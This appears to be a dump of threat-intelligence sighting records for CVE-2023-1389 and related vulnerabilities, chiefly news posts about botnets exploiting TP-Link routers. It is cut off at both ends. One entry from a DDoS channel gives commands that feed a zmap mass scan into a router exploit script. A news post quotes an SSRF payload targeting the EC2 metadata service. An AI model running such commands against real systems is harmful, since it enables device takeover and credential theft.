\u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u043e\u0442\u0438\u0432 \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439. \u0414\u0430\u0436\u0435 \u0441 \u0443\u0447\u0451\u0442\u043e\u043c \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u0432 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439, \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442 \u043e\u0441\u0442\u0430\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0435\u0437\u0430\u043a\u0440\u044b\u0442\u044b\u043c\u0438 \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u2014 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e, \u0435\u0441\u043b\u0438 \u0440\u0435\u0447\u044c \u0438\u0434\u0451\u0442 \u043e \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u0445 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0430\u043c\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043f\u0440\u0438 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u0435.\n\n\u0422\u0440\u0435\u0442\u044c\u044e \u0441\u0442\u0440\u043e\u0447\u043a\u0443 \u0437\u0430\u043d\u044f\u043b\u0430 CVE-2024-4577 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 9.8) \u2014 \u0441\u0432\u0435\u0436\u0430\u044f \u0438 \u043e\u043f\u0430\u0441\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 PHP-CGI \u043d\u0430 Windows, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043e\u0431\u0445\u043e\u0434\u043e\u043c \u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 \u0431\u0430\u0433 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0438 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432. \u0412 \u0430\u0442\u0430\u043a\u0430\u0445 \u0441 \u0435\u0451 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043c\u0430\u0439\u043d\u0435\u0440\u044b \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442, \u0431\u043e\u0442\u043d\u0435\u0442\u044b \u0438 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0435 \u0442\u0440\u043e\u044f\u043d\u044b. \u0421\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u0441\u043e\u0432\u0435\u0442\u0443\u044e\u0442 \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c PHP, \u043d\u043e \u0438 \u043f\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u043e\u0442\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c\u0441\u044f \u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f CGI-\u0440\u0435\u0436\u0438\u043c\u0430 \u0432 \u043f\u043e\u043b\u044c\u0437\u0443 \u0431\u043e\u043b\u0435\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0433\u043e PHP-FPM.\n\n\u041d\u0435 \u0442\u0435\u0440\u044f\u0435\u0442 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0441\u0442\u0438 \u0438 CVE-2019-9082 (\u043e\u0446\u0435\u043d\u043a\u0430 CVSS: 8.8), \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 ThinkPHP, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435. \u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0432\u043e\u0437\u0440\u0430\u0441\u0442, \u043e\u043d\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u043f\u043e\u0434\u0447\u0451\u0440\u043a\u0438\u0432\u0430\u0435\u0442 \u043e\u0431\u0449\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443: \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0430\u0442\u0430\u043a \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0447\u0435\u0442\u044b\u0440\u0451\u0445\u043b\u0435\u0442\u043d\u0435\u0439 \u0438 \u0431\u043e\u043b\u0435\u0435 \u0434\u0430\u0432\u043d\u043e\u0441\u0442\u0438.\n\n\u041e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u044f \u0437\u0430\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u0435\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0432 \u043c\u0430\u0440\u0442\u0435 \u0430\u0442\u0430\u043a\u0430 \u043d\u0430 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u044b Amazon. \u0412 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0434\u043d\u0435\u0439 \u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u0430\u044f \u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 EC2 Instance Metadata \u0447\u0435\u0440\u0435\u0437 SSRF. \u0410\u0442\u0430\u043a\u0438 \u0431\u044b\u043b\u0438 \u043a\u0440\u0430\u0442\u043a\u043e\u0441\u0440\u043e\u0447\u043d\u044b\u043c\u0438, \u043d\u043e \u0445\u043e\u0440\u043e\u0448\u043e \u0441\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438: \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c GET-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043a \u0430\u0434\u0440\u0435\u0441\u0430\u043c \u0432\u0440\u043e\u0434\u0435 /?url= http://169.254.169.254/latest/meta-data/ , \u0430 \u0442\u0430\u043a\u0436\u0435 \u0438\u0445 \u043c\u043e\u0434\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0441 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 (target, file, uri \u0438 \u0434\u0440.). \u0426\u0435\u043b\u044c \u2014 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0434\u0430\u043d\u043d\u044b\u043c EC2, \u0432\u043a\u043b\u044e\u0447\u0430\u044f IAM-\u0443\u0447\u0451\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0438 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044e. \u0412\u0441\u0435 \u0430\u0442\u0430\u043a\u0438 \u0448\u043b\u0438 \u0441 IP-\u0430\u0434\u0440\u0435\u0441\u043e\u0432 \u043e\u0434\u043d\u043e\u0433\u043e \u0430\u0432\u0442\u043e\u043d\u043e\u043c\u043d\u043e\u0433\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0433\u043e \u043d\u043e\u043c\u0435\u0440\u0430, \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0435\u0433\u043e \u0444\u0440\u0430\u043d\u0446\u0443\u0437\u0441\u043a\u043e\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u0441 \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u0430\u043c\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0435\u0434\u0438\u043d\u043e\u0439 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b.\n\n\u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0430 \u043e\u0431\u0445\u043e\u0434\u0438\u0442 \u0437\u0430\u0449\u0438\u0442\u0443 \u0447\u0435\u0440\u0435\u0437 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f. \u0427\u0442\u043e\u0431\u044b \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f \u043e\u0442 \u0442\u0430\u043a\u0438\u0445 \u0430\u0442\u0430\u043a, AWS \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u0442\u044c \u0441 IMDSv1 \u043d\u0430 IMDSv2 \u2014 \u044d\u0442\u043e\u0442 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0442\u043e\u043a\u0435\u043d \u0432 \u0437\u0430\u0433\u043e\u043b\u043e\u0432\u043a\u0435, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 SSRF-\u0430\u0442\u0430\u043a\u0438 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u043c\u0438.\n\n\u0410\u043d\u0430\u043b\u0438\u0437 \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u0439 \u0437\u0430 \u0433\u043e\u0434 \u043f\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u044b\u0439 \u0440\u043e\u0441\u0442 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043f\u043e \u0442\u0440\u0435\u043c \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c: CVE-2019-9082 \u043f\u043e\u0441\u0442\u0435\u043f\u0435\u043d\u043d\u043e \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u043d\u0430 \u0440\u0430\u0434\u0430\u0440\u044b \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445, CVE-2024-4577 \u0431\u044b\u0441\u0442\u0440\u043e \u043d\u0430\u0431\u0438\u0440\u0430\u0435\u0442 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0441\u0442\u044c, \u0430 CVE-2022-47945 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442 \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u0443\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c.\n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0435\u0438\u0437\u043c\u0435\u043d\u043d\u044b\u043c\u0438: \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a, \u0442\u0430\u043a\u0438\u0435 \u043a\u0430\u043a WAF . \u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0432\u0430\u0436\u043d\u043e \u0441\u043b\u0435\u0434\u0438\u0442\u044c \u0437\u0430 \u0442\u0440\u0430\u0444\u0438\u043a\u043e\u043c \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 outbound-\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c \u043d\u0430 \u0443\u0447\u0430\u0441\u0442\u0438\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0432 \u0431\u043e\u0442\u043d\u0435\u0442\u0435 \u0438\u043b\u0438 \u0443\u0442\u0435\u0447\u043a\u0443 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2025-04-11T05:27:59.000000Z"}, {"uuid": "c8cc36e9-eb98-43dc-87c5-eb32c8d95a88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "published-proof-of-concept", "source": "Telegram/H7lK3nUpC0mRy_HOMC2Efj8LSEYXH-2h4-ofgR3OSVOLKw", "content": "", "creation_timestamp": "2024-08-10T00:36:10.000000Z"}, {"uuid": "d32bd736-7eae-407a-ac27-d6baf4904a7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://t.me/ctinow/152504", "content": "https://ift.tt/dQ7AV5C\nProphetic Post by Intern on CVE-2023-1389 Foreshadows Mirai Botnet Expansion Today, (Thu, Nov 30th)", "creation_timestamp": "2023-11-30T05:06:54.000000Z"}, {"uuid": "328ab937-cb1f-4138-9a4d-874decbb1651", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "published-proof-of-concept", "source": "Telegram/kr7Ohy0kCux9XxUt9uuveXj3FxKXvYpnI4IpH_bL8ZTn0g", "content": "", "creation_timestamp": "2024-08-09T22:25:27.000000Z"}, {"uuid": "df811627-8972-48c6-b01d-2f8da47ee3d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "published-proof-of-concept", "source": "Telegram/SxKtx6aqpJzN32Yy6wpH3EXVpAEGIzhv3ifhV-Bb4iL1y4o", "content": "", "creation_timestamp": "2024-08-09T22:27:25.000000Z"}, {"uuid": "ce719505-27ec-4d79-afc1-1bff85d76f37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "https://t.me/ton618cyber/3178", "content": "Ballista Botnet Exploits Unpatched TP-Link Vulnerability, Infects Over 6,000 Devices\n\nBallista botnet exploits TP-Link router flaw CVE-2023-1389, infecting 6,000+ devices worldwide and evolving to use TOR.\n\nThe Hacker News | thehackernews.com \u2022 Mar 11, 2025", "creation_timestamp": "2025-03-11T16:46:51.000000Z"}, {"uuid": "abeb7c7d-5704-4c28-bdf4-8d3ad0b2fb76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "https://t.me/KomunitiSiber/136", "content": "Alert: Active Exploitation of TP-Link, Apache, and Oracle Vulnerabilities Detected\nhttps://thehackernews.com/2023/05/active-exploitation-of-tp-link-apache.html\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has\u00a0added\u00a0three flaws to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.\nThe security vulnerabilities are as follows -\n\nCVE-2023-1389\u00a0(CVSS score: 8.8) - TP-Link Archer AX-21 Command Injection Vulnerability\nCVE-2021-45046\u00a0(CVSS score: 9.0) - Apache Log4j2 Deserialization of Untrusted", "creation_timestamp": "2023-05-02T08:03:43.000000Z"}, {"uuid": "dd3e26c3-db6b-4bde-9da3-61c9531c7a7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-29)", "content": "", "creation_timestamp": "2026-04-29T00:00:00.000000Z"}, {"uuid": "9f162855-0fe3-4e5e-8743-dbd032c53930", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "Telegram/SflKLAyrw451xjulqLb7wtuD45S42eOWAhbMET52rAM_WA", "content": "", "creation_timestamp": "2023-08-24T07:49:30.000000Z"}, {"uuid": "f8fe7915-96ec-4518-bee2-5e830ec097a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "Telegram/xIcTVOPfTqre2zWnWl7zKhDYEsscubeQKEtQrZ2-AUunDg", "content": "", "creation_timestamp": "2023-09-01T02:26:47.000000Z"}, {"uuid": "b29cd80e-8740-42f4-87d9-5defa11fefad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "Telegram/_URrgi_ugWAyYY1Gb5I-PE6Qg7nO6YbwxbXSuh_zqDNy3g", "content": "", "creation_timestamp": "2023-05-02T08:37:02.000000Z"}, {"uuid": "f5f1d3e7-d943-491b-8bb9-1793941708ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "Telegram/n9k8OzZwL0BgiEHMLrgMuBJOM9lHdKhsFPOZP8zBX3RxWQ", "content": "", "creation_timestamp": "2025-03-11T14:16:49.000000Z"}, {"uuid": "34b4299d-c124-4891-ae24-3e6efdb2faa5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "published-proof-of-concept", "source": "https://t.me/richddos/32216", "content": "TP-Link Archer AX21 exploit (x86)\n\nBased on:\nCVE-2023-1389\nCVE-2024-0778\n\nStart with zmap:\nzmap -p8080 -B 30M -q -o- | awk {'print $0\":8080\"'} | python3 tplink.py\n\nStart with list:\ncat tplink.txt | python3 tplink.py\n\ncredits: @wertyddos | @richddos | @cyber_raw", "creation_timestamp": "2024-08-09T22:29:03.000000Z"}, {"uuid": "f0aa8a6a-63f0-441c-bbf1-afaa3dbe0f5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://t.me/arpsyndicate/833", "content": "#ExploitObserverAlert\n\nCVE-2023-1389\n\nDESCRIPTION: Exploit Observer has 15 entries related to CVE-2023-1389. TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.\n\nFIRST-EPSS: 0.063550000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-01T06:57:33.000000Z"}, {"uuid": "7ced54d8-4352-41e6-91ec-587faec7b008", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "published-proof-of-concept", "source": "Telegram/SrJTbD-TkMbeVuzrD9RPDcM24NioVuv3lHpFSzBU4Vf-pz4", "content": "", "creation_timestamp": "2025-04-26T17:00:10.000000Z"}, {"uuid": "f5436199-44dc-4590-af63-569db7e35f7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "https://t.me/true_secator/6584", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Akamai \u0441\u043e\u043e\u0431\u0448\u0430\u044e\u0442 \u043e \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0438 \u043d\u043e\u0432\u043e\u0433\u043e \u0431\u043e\u0442\u043d\u0435\u0442\u0430 Hail Cock \u043d\u0430 \u0431\u0430\u0437\u0435 \u043d\u0430\u0441\u043b\u0435\u0434\u0438\u044f Mirai, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u0446\u0435\u043b\u0435\u043d \u043d\u0430 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0432\u0438\u0434\u0435\u043e\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u0445 DigiEver DS-2105 Pro, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE \u0438, \u043f\u043e-\u0432\u0438\u0434\u0438\u043c\u043e\u043c\u0443, \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439.\n\n\u041a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0430\u0447\u0430\u043b\u0430\u0441\u044c \u0432 \u043e\u043a\u0442\u044f\u0431\u0440\u0435 \u0438 \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u0430 \u043d\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0432\u0438\u0434\u0435\u043e\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432 \u0438 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u043e\u0432 TP-Link \u0441 \u0443\u0441\u0442\u0430\u0440\u0435\u0432\u0448\u0435\u0439 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u043e\u0439.\n\n\u041e\u0434\u043d\u0430 \u0438\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0432 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438, \u0431\u044b\u043b\u0430 \u0437\u0430\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c TXOne \u0422\u0430-\u041b\u0443\u043d \u0419\u0435\u043d\u043e\u043c \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0433\u043e\u0434\u0443 \u043d\u0430 \u043a\u043e\u043d\u0444\u0435\u0440\u0435\u043d\u0446\u0438\u0438 DefCamp \u0432 \u0411\u0443\u0445\u0430\u0440\u0435\u0441\u0442\u0435, \u0420\u0443\u043c\u044b\u043d\u0438\u044f.\n\nAkamai \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0431\u043e\u0442\u043d\u0435\u0442 \u043d\u0430\u0447\u0430\u043b \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u043d\u043e\u044f\u0431\u0440\u044f, \u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0434\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u0431\u044b\u043b\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430 \u043a\u0430\u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c \u0441 \u0441\u0435\u043d\u0442\u044f\u0431\u0440\u044f.\n\n\u041f\u043e\u043c\u0438\u043c\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 DigiEver \u043d\u043e\u0432\u044b\u0439 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e Mirai \u0442\u0430\u043a\u0436\u0435 \u043d\u0430\u0446\u0435\u043b\u0435\u043d \u043d\u0430 